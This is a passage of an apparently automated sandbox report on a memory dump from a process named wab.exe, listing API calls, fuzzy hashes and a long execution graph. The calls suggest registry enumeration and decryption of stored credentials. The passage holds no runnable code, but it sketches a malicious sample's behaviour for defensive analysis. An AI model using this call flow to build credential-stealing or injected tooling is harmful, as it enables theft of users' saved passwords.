                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                  • API String ID: 2773794195-880857682
                                                  • Opcode ID: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                  • Opcode Fuzzy Hash: c93510e3b53e51a0fa34588ad362a10002a2b390dcacad00d2ab9882db4cd41e
                                                  • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$memset
                                                  • String ID:
                                                  • API String ID: 438689982-0
                                                  • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                  • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                  • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$memset
                                                  • String ID:
                                                  • API String ID: 1860491036-0
                                                  • Opcode ID: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                  • Opcode Fuzzy Hash: 96af4030734a5e2f6ef23c2ae6277f6dabdb1784b135b246f31e93988d402875
                                                  • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcmp.MSVCRT ref: 00408AF3
                                                    • Part of subcall function 00408A6E: memcmp.MSVCRT ref: 00408A8C
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408ABB
                                                    • Part of subcall function 00408A6E: memcpy.MSVCRT ref: 00408AD0
                                                  • memcmp.MSVCRT ref: 00408B2B
                                                  • memcmp.MSVCRT ref: 00408B5C
                                                  • memcpy.MSVCRT ref: 00408B79
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID:
                                                  • API String ID: 231171946-0
                                                  • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                  • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                  • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000B.00000002.3089029097.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcslen$wcscat$wcscpy
                                                  • String ID:
                                                  • API String ID: 1961120804-0
                                                  • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                  • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                  • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:2.4%
                                                  Dynamic/Decrypted Code Coverage:20.5%
                                                  Signature Coverage:0.5%
                                                  Total number of Nodes:844
                                                  Total number of Limit Nodes:16
                                                  execution_graph 34106 40fc40 70 API calls 34279 403640 21 API calls 34107 427fa4 42 API calls 34280 412e43 _endthreadex 34281 425115 76 API calls __fprintf_l 34282 43fe40 133 API calls 34110 425115 83 API calls __fprintf_l 34111 401445 memcpy memcpy DialogBoxParamA 34112 440c40 34 API calls 33240 444c4a 33259 444e38 33240->33259 33242 444c56 GetModuleHandleA 33243 444c68 __set_app_type __p__fmode __p__commode 33242->33243 33245 444cfa 33243->33245 33246 444d02 __setusermatherr 33245->33246 33247 444d0e 33245->33247 33246->33247 33260 444e22 _controlfp 33247->33260 33249 444d13 _initterm __getmainargs _initterm 33250 444d6a GetStartupInfoA 33249->33250 33252 444d9e GetModuleHandleA 33250->33252 33261 40cf44 33252->33261 33256 444dcf _cexit 33258 444e04 33256->33258 33257 444dc8 exit 33257->33256 33259->33242 33260->33249 33312 404a99 LoadLibraryA 33261->33312 33263 40cf60 33300 40cf64 33263->33300 33319 410d0e 33263->33319 33265 40cf6f 33323 40ccd7 ??2@YAPAXI 33265->33323 33267 40cf9b 33337 407cbc 33267->33337 33272 40cfc4 33355 409825 memset 33272->33355 33273 40cfd8 33360 4096f4 memset 33273->33360 33278 40d181 ??3@YAXPAX 33280 40d1b3 33278->33280 33281 40d19f DeleteObject 33278->33281 33279 407e30 _strcmpi 33282 40cfee 33279->33282 33384 407948 ??3@YAXPAX ??3@YAXPAX 33280->33384 33281->33280 33284 40cff2 RegDeleteKeyA 33282->33284 33285 40d007 EnumResourceTypesA 33282->33285 33284->33278 33287 40d047 33285->33287 33288 40d02f MessageBoxA 33285->33288 33286 40d1c4 33385 4080d4 ??3@YAXPAX 33286->33385 33290 40d0a0 CoInitialize 33287->33290 33365 40ce70 33287->33365 33288->33278 33382 40cc26 strncat memset RegisterClassA CreateWindowExA 33290->33382 33292 40d1cd 33386 407948 ??3@YAXPAX ??3@YAXPAX 33292->33386 33295 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33383 40c256 PostMessageA 33295->33383 33297 40d061 ??3@YAXPAX 33297->33280 33301 40d084 DeleteObject 33297->33301 33298 40d09e 33298->33290 33300->33256 33300->33257 33301->33280 33304 40d0f9 GetMessageA 33305 40d17b 33304->33305 33306 40d10d 33304->33306 33305->33278 33307 40d113 TranslateAccelerator 33306->33307 33309 40d145 IsDialogMessage 33306->33309 33310 40d139 IsDialogMessage 33306->33310 33307->33306 33308 40d16d GetMessageA 33307->33308 33308->33305 33308->33307 33309->33308 33311 40d157 TranslateMessage DispatchMessageA 33309->33311 33310->33308 33310->33309 33311->33308 33313 404ac4 GetProcAddress 33312->33313 33314 404ae8 33312->33314 33315 404ad4 33313->33315 33316 404add FreeLibrary 33313->33316 33317 404b13 33314->33317 33318 404afc MessageBoxA 33314->33318 33315->33316 33316->33314 33317->33263 33318->33263 33320 410d17 LoadLibraryA 33319->33320 33321 410d3c 33319->33321 33320->33321 33322 410d2b GetProcAddress 33320->33322 33321->33265 33322->33321 33324 40cd08 ??2@YAPAXI 33323->33324 33326 40cd26 33324->33326 33327 40cd2d 33324->33327 33394 404025 6 API calls 33326->33394 33329 40cd66 33327->33329 33330 40cd59 DeleteObject 33327->33330 33387 407088 33329->33387 33330->33329 33332 40cd6b 33390 4019b5 33332->33390 33335 4019b5 strncat 33336 40cdbf _mbscpy 33335->33336 33336->33267 33396 407948 ??3@YAXPAX ??3@YAXPAX 33337->33396 33339 407e04 33397 407a55 33339->33397 33342 407a1f malloc memcpy ??3@YAXPAX ??3@YAXPAX 33349 407cf7 33342->33349 33343 407ddc 33343->33339 33409 407a1f 33343->33409 33345 407d7a ??3@YAXPAX 33345->33349 33349->33339 33349->33342 33349->33343 33349->33345 33400 40796e 7 API calls 33349->33400 33401 406f30 33349->33401 33351 407e30 33352 407e57 33351->33352 33353 407e38 33351->33353 33352->33272 33352->33273 33353->33352 33354 407e41 _strcmpi 33353->33354 33354->33352 33354->33353 33415 4097ff 33355->33415 33357 409854 33420 409731 33357->33420 33361 4097ff 3 API calls 33360->33361 33362 409723 33361->33362 33440 40966c 33362->33440 33454 4023b2 33365->33454 33371 40ced3 33543 40cdda 7 API calls 33371->33543 33372 40cece 33375 40cf3f 33372->33375 33495 40c3d0 memset GetModuleFileNameA strrchr 33372->33495 33375->33297 33375->33298 33378 40ceed 33522 40affa 33378->33522 33382->33295 33383->33304 33384->33286 33385->33292 33386->33300 33395 406fc7 memset _mbscpy 33387->33395 33389 40709f CreateFontIndirectA 33389->33332 33391 4019e1 33390->33391 33392 4019c2 strncat 33391->33392 33393 4019e5 memset LoadIconA 33391->33393 33392->33391 33393->33335 33394->33327 33395->33389 33396->33349 33398 407a65 33397->33398 33399 407a5b ??3@YAXPAX 33397->33399 33398->33351 33399->33398 33400->33349 33402 406f37 malloc 33401->33402 33403 406f7d 33401->33403 33405 406f73 33402->33405 33406 406f58 33402->33406 33403->33349 33405->33349 33407 406f6c ??3@YAXPAX 33406->33407 33408 406f5c memcpy 33406->33408 33407->33405 33408->33407 33410 407a38 33409->33410 33411 407a2d ??3@YAXPAX 33409->33411 33413 406f30 3 API calls 33410->33413 33412 407a43 33411->33412 33414 40796e 7 API calls 33412->33414 33413->33412 33414->33339 33431 406f96 GetModuleFileNameA 33415->33431 33417 409805 strrchr 33418 409814 33417->33418 33419 409817 _mbscat 33417->33419 33418->33419 33419->33357 33432 44b090 33420->33432 33425 40930c 3 API calls 33426 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33425->33426 33427 4097c5 LoadStringA 33426->33427 33428 4097db 33427->33428 33428->33427 33430 4097f3 33428->33430 33439 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33428->33439 33430->33278 33431->33417 33433 40973e _mbscpy _mbscpy 33432->33433 33434 40930c 33433->33434 33435 44b090 33434->33435 33436 409319 memset GetPrivateProfileStringA 33435->33436 33437 409374 33436->33437 33438 409364 WritePrivateProfileStringA 33436->33438 33437->33425 33438->33437 33439->33428 33450 406f81 GetFileAttributesA 33440->33450 33442 409675 33443 4096ee 33442->33443 33444 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33442->33444 33443->33279 33451 409278 GetPrivateProfileStringA 33444->33451 33446 4096c9 33452 409278 GetPrivateProfileStringA 33446->33452 33448 4096da 33453 409278 GetPrivateProfileStringA 33448->33453 33450->33442 33451->33446 33452->33448 33453->33443 33545 409c1c 33454->33545 33457 401e69 memset 33584 410dbb 33457->33584 33460 401ec2 33614 4070e3 strlen _mbscat _mbscpy _mbscat 33460->33614 33461 401ed4 33599 406f81 GetFileAttributesA 33461->33599 33464 401ee6 strlen strlen 33466 401f15 33464->33466 33468 401f28 33464->33468 33615 4070e3 strlen _mbscat _mbscpy _mbscat 33466->33615 33600 406f81 GetFileAttributesA 33468->33600 33470 401f35 33601 401c31 33470->33601 33473 401f75 33613 410a9c RegOpenKeyExA 33473->33613 33474 401c31 7 API calls 33474->33473 33476 401f91 33477 402187 33476->33477 33478 401f9c memset 33476->33478 33480 402195 ExpandEnvironmentStringsA 33477->33480 33481 4021a8 _strcmpi 33477->33481 33616 410b62 RegEnumKeyExA 33478->33616 33625 406f81 GetFileAttributesA 33480->33625 33481->33371 33481->33372 33483 40217e RegCloseKey 33483->33477 33484 401fd9 atoi 33485 401fef memset memset sprintf 33484->33485 33492 401fc9 33484->33492 33617 410b1e 33485->33617 33488 402165 33488->33483 33489 402076 memset memset strlen strlen 33489->33492 33490 4070e3 strlen _mbscat _mbscpy _mbscat 33490->33492 33491 4020dd strlen strlen 33491->33492 33492->33483 33492->33484 33492->33488 33492->33489 33492->33490 33492->33491 33493 406f81 GetFileAttributesA 33492->33493 33494 402167 _mbscpy 33492->33494 33624 410b62 RegEnumKeyExA 33492->33624 33493->33492 33494->33483 33496 40c422 33495->33496 33497 40c425 _mbscat _mbscpy _mbscpy 33495->33497 33496->33497 33498 40c49d 33497->33498 33499 40c512 33498->33499 33500 40c502 GetWindowPlacement 33498->33500 33501 40c538 33499->33501 33646 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33499->33646 33500->33499 33639 409b31 33501->33639 33505 40ba28 33506 40ba87 33505->33506 33512 40ba3c 33505->33512 33649 406c62 LoadCursorA SetCursor 33506->33649 33508 40ba43 _mbsicmp 33508->33512 33509 40ba8c 33650 410a9c RegOpenKeyExA 33509->33650 33651 404734 33509->33651 33659 4107f1 33509->33659 33662 404785 33509->33662 33665 403c16 33509->33665 33510 40baa0 33511 407e30 _strcmpi 33510->33511 33515 40bab0 33511->33515 33512->33506 33512->33508 33741 40b5e5 10 API calls 33512->33741 33513 40bafa SetCursor 33513->33378 33515->33513 33516 40baf1 qsort 33515->33516 33516->33513 34099 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33522->34099 33524 40b00e 33525 40b016 33524->33525 33526 40b01f GetStdHandle 33524->33526 34100 406d1a CreateFileA 33525->34100 33528 40b01c 33526->33528 33529 40b035 33528->33529 33530 40b12d 33528->33530 34101 406c62 LoadCursorA SetCursor 33529->34101 34105 406d77 9 API calls 33530->34105 33533 40b136 33544 40c580 28 API calls 33533->33544 33534 40b042 33536 40b087 33534->33536 33541 40b0a1 33534->33541 34102 40a57c strlen WriteFile 33534->34102 33536->33541 34103 40a699 12 API calls 33536->34103 33538 40b0d6 33539 40b116 CloseHandle 33538->33539 33540 40b11f SetCursor 33538->33540 33539->33540 33540->33533 33541->33538 34104 406d77 9 API calls 33541->34104 33543->33372 33544->33375 33557 409a32 33545->33557 33548 409c80 memcpy memcpy 33549 409cda 33548->33549 33549->33548 33550 409d18 ??2@YAPAXI ??2@YAPAXI 33549->33550 33554 408db6 12 API calls 33549->33554 33552 409d54 ??2@YAPAXI 33550->33552 33553 409d8b 33550->33553 33552->33553 33567 409b9c 33553->33567 33554->33549 33556 4023c1 33556->33457 33558 409a44 33557->33558 33559 409a3d ??3@YAXPAX 33557->33559 33560 409a52 33558->33560 33561 409a4b ??3@YAXPAX 33558->33561 33559->33558 33562 409a63 33560->33562 33563 409a5c ??3@YAXPAX 33560->33563 33561->33560 33564 409a83 ??2@YAPAXI ??2@YAPAXI 33562->33564 33565 409a73 ??3@YAXPAX 33562->33565 33566 409a7c ??3@YAXPAX 33562->33566 33563->33562 33564->33548 33565->33566 33566->33564 33568 407a55 ??3@YAXPAX 33567->33568 33569 409ba5 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bad 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bb5 33572->33573 33574 407a55 ??3@YAXPAX 33573->33574 33575 409bbd 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bd0 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409bda 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409be4 33580->33581 33582 407a1f 4 API calls 33581->33582 33583 409bee 33582->33583 33583->33556 33585 410d0e 2 API calls 33584->33585 33586 410dca 33585->33586 33587 410dfd memset 33586->33587 33626 4070ae 33586->33626 33588 410e1d 33587->33588 33629 410a9c RegOpenKeyExA 33588->33629 33591 401e9e strlen strlen 33591->33460 33591->33461 33593 410e4a 33594 410e7f _mbscpy 33593->33594 33630 410d3d _mbscpy 33593->33630 33594->33591 33596 410e5b 33631 410add RegQueryValueExA 33596->33631 33598 410e73 RegCloseKey 33598->33594 33599->33464 33600->33470 33632 410a9c RegOpenKeyExA 33601->33632 33603 401c4c 33604 401cad 33603->33604 33633 410add RegQueryValueExA 33603->33633 33604->33473 33604->33474 33606 401c6a 33607 401c71 strchr 33606->33607 33608 401ca4 RegCloseKey 33606->33608 33607->33608 33609 401c85 strchr 33607->33609 33608->33604 33609->33608 33610 401c94 33609->33610 33634 406f06 strlen 33610->33634 33612 401ca1 33612->33608 33613->33476 33614->33461 33615->33468 33616->33492 33637 410a9c RegOpenKeyExA 33617->33637 33619 410b34 33620 410b5d 33619->33620 33638 410add RegQueryValueExA 33619->33638 33620->33492 33622 410b4c RegCloseKey 33622->33620 33624->33492 33625->33481 33627 4070bd GetVersionExA 33626->33627 33628 4070ce 33626->33628 33627->33628 33628->33587 33628->33591 33629->33593 33630->33596 33631->33598 33632->33603 33633->33606 33635 406f17 33634->33635 33636 406f1a memcpy 33634->33636 33635->33636 33636->33612 33637->33619 33638->33622 33640 409b40 33639->33640 33642 409b4e 33639->33642 33647 409901 memset SendMessageA 33640->33647 33643 409b99 33642->33643 33644 409b8b 33642->33644 33643->33505 33648 409868 SendMessageA 33644->33648 33646->33501 33647->33642 33648->33643 33649->33509 33650->33510 33652 404785 FreeLibrary 33651->33652 33653 40473b LoadLibraryA 33652->33653 33654 40474c GetProcAddress 33653->33654 33657 40476e 33653->33657 33655 404764 33654->33655 33654->33657 33655->33657 33656 404781 33656->33510 33657->33656 33658 404785 FreeLibrary 33657->33658 33658->33656 33660 410807 33659->33660 33661 4107fc FreeLibrary 33659->33661 33660->33510 33661->33660 33663 4047a3 33662->33663 33664 404799 FreeLibrary 33662->33664 33663->33510 33664->33663 33666 4107f1 FreeLibrary 33665->33666 33667 403c30 LoadLibraryA 33666->33667 33668 403c74 33667->33668 33669 403c44 GetProcAddress 33667->33669 33670 4107f1 FreeLibrary 33668->33670 33669->33668 33671 403c5e 33669->33671 33672 403c7b 33670->33672 33671->33668 33674 403c6b 33671->33674 33673 404734 3 API calls 33672->33673 33675 403c86 33673->33675 33674->33672 33742 4036e5 33675->33742 33678 4036e5 26 API calls 33679 403c9a 33678->33679 33680 4036e5 26 API calls 33679->33680 33681 403ca4 33680->33681 33682 4036e5 26 API calls 33681->33682 33683 403cae 33682->33683 33754 4085d2 33683->33754 33691 403ce5 33692 403cf7 33691->33692 33935 402bd1 39 API calls 33691->33935 33800 410a9c RegOpenKeyExA 33692->33800 33695 403d0a 33696 403d1c 33695->33696 33936 402bd1 39 API calls 33695->33936 33801 402c5d 33696->33801 33700 4070ae GetVersionExA 33701 403d31 33700->33701 33819 410a9c RegOpenKeyExA 33701->33819 33703 403d51 33704 403d61 33703->33704 33937 402b22 46 API calls 33703->33937 33820 410a9c RegOpenKeyExA 33704->33820 33707 403d87 33708 403d97 33707->33708 33938 402b22 46 API calls 33707->33938 33821 410a9c RegOpenKeyExA 33708->33821 33711 403dbd 33712 403dcd 33711->33712 33939 402b22 46 API calls 33711->33939 33822 410808 33712->33822 33716 404785 FreeLibrary 33717 403de8 33716->33717 33826 402fdb 33717->33826 33720 402fdb 34 API calls 33721 403e00 33720->33721 33842 4032b7 33721->33842 33730 403e3b 33732 403e73 33730->33732 33733 403e46 _mbscpy 33730->33733 33889 40fb00 33732->33889 33941 40f334 334 API calls 33733->33941 33741->33512 33743 4037c5 33742->33743 33744 4036fb 33742->33744 33743->33678 33942 410863 UuidFromStringA UuidFromStringA memcpy 33744->33942 33746 40370e 33746->33743 33747 403716 strchr 33746->33747 33747->33743 33748 403730 33747->33748 33943 4021b6 memset 33748->33943 33750 40373f _mbscpy _mbscpy strlen 33751 4037a4 _mbscpy 33750->33751 33752 403789 sprintf 33750->33752 33944 4023e5 16 API calls 33751->33944 33752->33751 33755 4085e2 33754->33755 33945 4082cd 11 API calls 33755->33945 33759 408600 33760 403cba 33759->33760 33761 40860b memset 33759->33761 33772 40821d 33760->33772 33948 410b62 RegEnumKeyExA 33761->33948 33763 4086d2 RegCloseKey 33763->33760 33765 408637 33765->33763 33766 40865c memset 33765->33766 33949 410a9c RegOpenKeyExA 33765->33949 33952 410b62 RegEnumKeyExA 33765->33952 33950 410add RegQueryValueExA 33766->33950 33769 408694 33951 40848b 10 API calls 33769->33951 33771 4086ab RegCloseKey 33771->33765 33953 410a9c RegOpenKeyExA 33772->33953 33774 40823f 33775 403cc6 33774->33775 33776 408246 memset 33774->33776 33784 4086e0 33775->33784 33954 410b62 RegEnumKeyExA 33776->33954 33778 4082bf RegCloseKey 33778->33775 33780 40826f 33780->33778 33955 410a9c RegOpenKeyExA 33780->33955 33956 4080ed 11 API calls 33780->33956 33957 410b62 RegEnumKeyExA 33780->33957 33783 4082a2 RegCloseKey 33783->33780 33958 4045db 33784->33958 33786 4088ef 33966 404656 33786->33966 33790 408737 wcslen 33790->33786 33796 40876a 33790->33796 33791 40877a _wcsncoll 33791->33796 33793 404734 3 API calls 33793->33796 33794 404785 FreeLibrary 33794->33796 33795 408812 memset 33795->33796 33797 40883c memcpy wcschr 33795->33797 33796->33786 33796->33791 33796->33793 33796->33794 33796->33795 33796->33797 33798 4088c3 LocalFree 33796->33798 33969 40466b _mbscpy 33796->33969 33797->33796 33798->33796 33799 410a9c RegOpenKeyExA 33799->33691 33800->33695 33970 410a9c RegOpenKeyExA 33801->33970 33803 402c7a 33804 402da5 33803->33804 33805 402c87 memset 33803->33805 33804->33700 33971 410b62 RegEnumKeyExA 33805->33971 33807 402d9c RegCloseKey 33807->33804 33808 410b1e 3 API calls 33809 402ce4 memset sprintf 33808->33809 33972 410a9c RegOpenKeyExA 33809->33972 33811 402d28 33812 402d3a sprintf 33811->33812 33973 402bd1 39 API calls 33811->33973 33974 410a9c RegOpenKeyExA 33812->33974 33815 402cb2 33815->33807 33815->33808 33818 402d9a 33815->33818 33975 402bd1 39 API calls 33815->33975 33976 410b62 RegEnumKeyExA 33815->33976 33818->33807 33819->33703 33820->33707 33821->33711 33823 410816 33822->33823 33824 4107f1 FreeLibrary 33823->33824 33825 403ddd 33824->33825 33825->33716 33977 410a9c RegOpenKeyExA 33826->33977 33828 402ff9 33829 403006 memset 33828->33829 33830 40312c 33828->33830 33978 410b62 RegEnumKeyExA 33829->33978 33830->33720 33832 403122 RegCloseKey 33832->33830 33833 410b1e 3 API calls 33834 403058 memset sprintf 33833->33834 33979 410a9c RegOpenKeyExA 33834->33979 33836 403033 33836->33832 33836->33833 33837 4030a2 memset 33836->33837 33838 410b62 RegEnumKeyExA 33836->33838 33840 4030f9 RegCloseKey 33836->33840 33981 402db3 26 API calls 33836->33981 33980 410b62 RegEnumKeyExA 33837->33980 33838->33836 33840->33836 33843 4032d5 33842->33843 33844 4033a9 33842->33844 33982 4021b6 memset 33843->33982 33857 4034e4 memset memset 33844->33857 33846 4032e1 33983 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33846->33983 33848 4032ea 33849 4032f8 memset GetPrivateProfileSectionA 33848->33849 33984 4023e5 16 API calls 33848->33984 33849->33844 33854 40332f 33849->33854 33851 40339b strlen 33851->33844 33851->33854 33853 403350 strchr 33853->33854 33854->33844 33854->33851 33985 4021b6 memset 33854->33985 33986 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33854->33986 33987 4023e5 16 API calls 33854->33987 33858 410b1e 3 API calls 33857->33858 33859 40353f 33858->33859 33860 40357f 33859->33860 33861 403546 _mbscpy 33859->33861 33865 403985 33860->33865 33988 406d55 strlen _mbscat 33861->33988 33863 403565 _mbscat 33989 4033f0 19 API calls 33863->33989 33990 40466b _mbscpy 33865->33990 33869 4039aa 33871 4039ff 33869->33871 33991 40f460 memset memset 33869->33991 34012 40f6e2 33869->34012 34028 4038e8 21 API calls 33869->34028 33872 404785 FreeLibrary 33871->33872 33873 403a0b 33872->33873 33874 4037ca memset memset 33873->33874 34036 444551 memset 33874->34036 33876 4038e2 33876->33730 33940 40f334 334 API calls 33876->33940 33879 40382e 33880 406f06 2 API calls 33879->33880 33881 403843 33880->33881 33882 406f06 2 API calls 33881->33882 33883 403855 strchr 33882->33883 33884 403884 _mbscpy 33883->33884 33885 403897 strlen 33883->33885 33886 4038bf _mbscpy 33884->33886 33885->33886 33887 4038a4 sprintf 33885->33887 34048 4023e5 16 API calls 33886->34048 33887->33886 33890 44b090 33889->33890 33891 40fb10 RegOpenKeyExA 33890->33891 33892 403e7f 33891->33892 33893 40fb3b RegOpenKeyExA 33891->33893 33903 40f96c 33892->33903 33894 40fb55 RegQueryValueExA 33893->33894 33895 40fc2d RegCloseKey 33893->33895 33896 40fc23 RegCloseKey 33894->33896 33897 40fb84 33894->33897 33895->33892 33896->33895 33898 404734 3 API calls 33897->33898 33899 40fb91 33898->33899 33899->33896 33900 40fc19 LocalFree 33899->33900 33901 40fbdd memcpy memcpy 33899->33901 33900->33896 34053 40f802 11 API calls 33901->34053 33904 4070ae GetVersionExA 33903->33904 33905 40f98d 33904->33905 33906 4045db 7 API calls 33905->33906 33910 40f9a9 33906->33910 33907 40fae6 33908 404656 FreeLibrary 33907->33908 33909 403e85 33908->33909 33915 4442ea memset 33909->33915 33910->33907 33911 40fa13 memset WideCharToMultiByte 33910->33911 33911->33910 33912 40fa43 _strnicmp 33911->33912 33912->33910 33913 40fa5b WideCharToMultiByte 33912->33913 33913->33910 33914 40fa88 WideCharToMultiByte 33913->33914 33914->33910 33916 410dbb 9 API calls 33915->33916 33917 444329 33916->33917 34054 40759e strlen strlen 33917->34054 33922 410dbb 9 API calls 33923 444350 33922->33923 33924 40759e 3 API calls 33923->33924 33925 44435a 33924->33925 33926 444212 65 API calls 33925->33926 33927 444366 memset memset 33926->33927 33928 410b1e 3 API calls 33927->33928 33929 4443b9 ExpandEnvironmentStringsA strlen 33928->33929 33930 4443f4 _strcmpi 33929->33930 33931 4443e5 33929->33931 33932 403e91 33930->33932 33933 44440c 33930->33933 33931->33930 33932->33510 33934 444212 65 API calls 33933->33934 33934->33932 33935->33692 33936->33696 33937->33704 33938->33708 33939->33712 33940->33730 33941->33732 33942->33746 33943->33750 33944->33743 33946 40841c 33945->33946 33947 410a9c RegOpenKeyExA 33946->33947 33947->33759 33948->33765 33949->33765 33950->33769 33951->33771 33952->33765 33953->33774 33954->33780 33955->33780 33956->33783 33957->33780 33959 404656 FreeLibrary 33958->33959 33960 4045e3 LoadLibraryA 33959->33960 33961 404651 33960->33961 33962 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33960->33962 33961->33786 33961->33790 33963 40463d 33962->33963 33964 404643 33963->33964 33965 404656 FreeLibrary 33963->33965 33964->33961 33965->33961 33967 403cd2 33966->33967 33968 40465c FreeLibrary 33966->33968 33967->33799 33968->33967 33969->33796 33970->33803 33971->33815 33972->33811 33973->33812 33974->33815 33975->33815 33976->33815 33977->33828 33978->33836 33979->33836 33980->33836 33981->33836 33982->33846 33983->33848 33984->33849 33985->33853 33986->33854 33987->33854 33988->33863 33989->33860 33990->33869 34029 4078ba 33991->34029 33994 4078ba _mbsnbcat 33995 40f5a3 RegOpenKeyExA 33994->33995 33996 40f5c3 RegQueryValueExA 33995->33996 33997 40f6d9 33995->33997 33998 40f6d0 RegCloseKey 33996->33998 33999 40f5f0 33996->33999 33997->33869 33998->33997 33999->33998 34000 40f675 33999->34000 34033 40466b _mbscpy 33999->34033 34000->33998 34034 4012ee strlen 34000->34034 34002 40f611 34004 404734 3 API calls 34002->34004 34009 40f616 34004->34009 34005 40f69e RegQueryValueExA 34005->33998 34006 40f6c1 34005->34006 34006->33998 34007 40f66a 34008 404785 FreeLibrary 34007->34008 34008->34000 34009->34007 34010 40f661 LocalFree 34009->34010 34011 40f645 memcpy 34009->34011 34010->34007 34011->34010 34035 40466b _mbscpy 34012->34035 34014 40f6fa 34015 4045db 7 API calls 34014->34015 34016 40f708 34015->34016 34017 404734 3 API calls 34016->34017 34022 40f7e2 34016->34022 34023 40f715 34017->34023 34018 404656 FreeLibrary 34019 40f7f1 34018->34019 34020 404785 FreeLibrary 34019->34020 34021 40f7fc 34020->34021 34021->33869 34022->34018 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33869 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33994 34033->34002 34034->34005 34035->34014 34049 410a9c RegOpenKeyExA 34036->34049 34038 44458b 34039 40381a 34038->34039 34050 410add RegQueryValueExA 34038->34050 34039->33876 34047 4021b6 memset 34039->34047 34041 4445a4 34042 